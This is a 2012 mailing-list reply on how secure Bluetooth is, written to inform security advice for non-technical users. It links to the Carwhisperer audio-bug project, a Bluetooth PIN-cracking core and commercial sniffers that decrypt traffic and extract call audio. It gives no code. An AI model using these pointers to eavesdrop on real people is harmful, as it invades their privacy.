[liberationtech] How secure is Bluetooth?

Jacob Appelbaum jacob at appelbaum.net
Sun Jan 29 22:23:07 PST 2012 

On 01/29/2012 04:09 PM, Brian Conley wrote:
> See my first email please.
> 
> Are there any documented cases of monitoring the audio transmitted between
> a Bluetooth headset and phone.

I guess you're looking for some personal stories or big news stories?

> 
> I am quite aware that Bluetooth is not safe for a variety of reasons.
> 

Please note that your users will likely be targeted by cops with FinFisher:
http://speciali.espresso.repubblica.it/pdf/spyfiles/it-intrusion.pdf

> When preparing advice for non technical people with very real security
> problems that are known, its important to provide the best advice about
> what is not known in their situation. I've been unable to find any
> information on the viability of intercepting audio transmissions, even the
> 2007 article doesn't appear to suggest for certain that they could
> reconstruct the audio file, merely that the potential might be there.
> 

Audio is a weird way to frame it. You have devices that communicate with
Bluetooth (TM) use common cryptography and protocols. The crypto is
busted: http://en.wikipedia.org/wiki/E0_(cipher)

This is a pretty funny read:
http://en.wikipedia.org/wiki/Bluetooth#Security

Overall, I think it's important to note that even if a device wasn't
used in a discoverable mode, a sniffer can at least passively track and
try to exploit devices nearby after seeing them transmit. This is likely
similiar to Bluejacking:
http://en.wikipedia.org/wiki/Bluejacking

Here's a project that uses a car as an audio bug:
http://trifinite.org/trifinite_stuff_carwhisperer.html

> I'm only asking if anyone has heard of documented cases of listening in to
> Bluetooth audio. So far it only seems to happen if there is a prior exploit
> in place and that doesn't even appear to be definitive.

R&S sells a solution to sniff traffic between two devices:
http://www2.rohde-schwarz.com/file_13603/Bluetooth_Sniffer_v2.4.pdf

"In  an  active  Piconet,  where  at  least  two  Bluetooth®  devices
(one  master,  one  or  more  slaves)  interact  with  each  other,  the
 USB  dongle  is  air  sniffing the communication  between  those.  This
 analysis  is  required  to  check  interoperability  of  Bluetooth®
devices  from  different  vendors  and  to  troubleshoot  problems  by
detailed protocol decoding"

Those guys also sell IMSI-catchers if you're in the market...

This "Decrypting Encrypted Bluetooth data with FTS4BT" is also a good read:
http://www.fte.com/docs/encryption%20and%20decryption%20in%20fts4bt.pdf

Basically, the FTS4BT just needs the pin to decrypt the data and that's
where h1kari's work comes in:
http://openciphers.sourceforge.net/oc/
http://openciphers.sourceforge.net/oc/btpincrack.php

Bluetooth Pin Cracking Core says:

"The bluetooth pin cracking core implements the basic bluetooth pin
cracking attack by generating possible PINs and running then through
SAFER+ to verify if they are correct or not. This uses the pipelined
implementation of SAFER+ and loops the output of the pipeline back into
itsself 7 times to perform all of the E21/E22/E1 functions. The max
clock speed we've been able to run it at on an E-12 is 75MHz which
results in ~10 million PINs per second compared to roughly 40k on a
modern CPU."

the openciphers project supports the protocol analyser files produced by
these devices:
http://www.lecroy.com/protocolanalyzer/?capid=103&mid=511

This does HCI and air interface sniffing in sync:
http://www.connectblue.com/products/sniffer-protocol-analyzers/bluetooth-sniffer-protocol-analyzer/

Note the features of that one:
"Extracts Audio into WAV files: Supports A2DP, HSP & HF Profiles with
playback for rapid quality check or performing a more detailed analysis"

And if all of that doesn't convince you that someone can sniff Bluetooth
- I encourage you to read this student's web page:
http://nap.cse.bgu.ac.il/home/index.php/Bluetooth_Sniffing

This seems to be the best buy for your money:
http://compare.ebay.com/like/150735473216?var=lv&ltyp=AllFixedPriceItemTypes&var=sbar

$799.99 for the LeCroy Merlin CATC Mobile Bluetooth Protocol Analyzer
seems like a deal. Even cheaper than the USRP!

If you're looking for other devices for BT sniffing, I also found this:
http://www.palowireless.com/bluearticles/bluetoothanalyzercompare1.asp

And finally - the Ellisys equipment:
http://www.ellisys.com/products/bex400/revolution.php
"The new Ellisys All-Channel sniffer robustly records any packet, at any
time, from any neighboring piconet, with zero-configuration and without
being intrusive."

http://www.ellisys.com/products/bex400/ has the best quote:
"Determine PIN codes automatically and decrypt the data on the fly"

Two nice photos of the device and software:
http://www.ellisys.com/archive/images/bex400.png
http://www.ellisys.com/archive/images/bex400_soft.png

All the best,
Jacob

More information about the liberationtech mailing list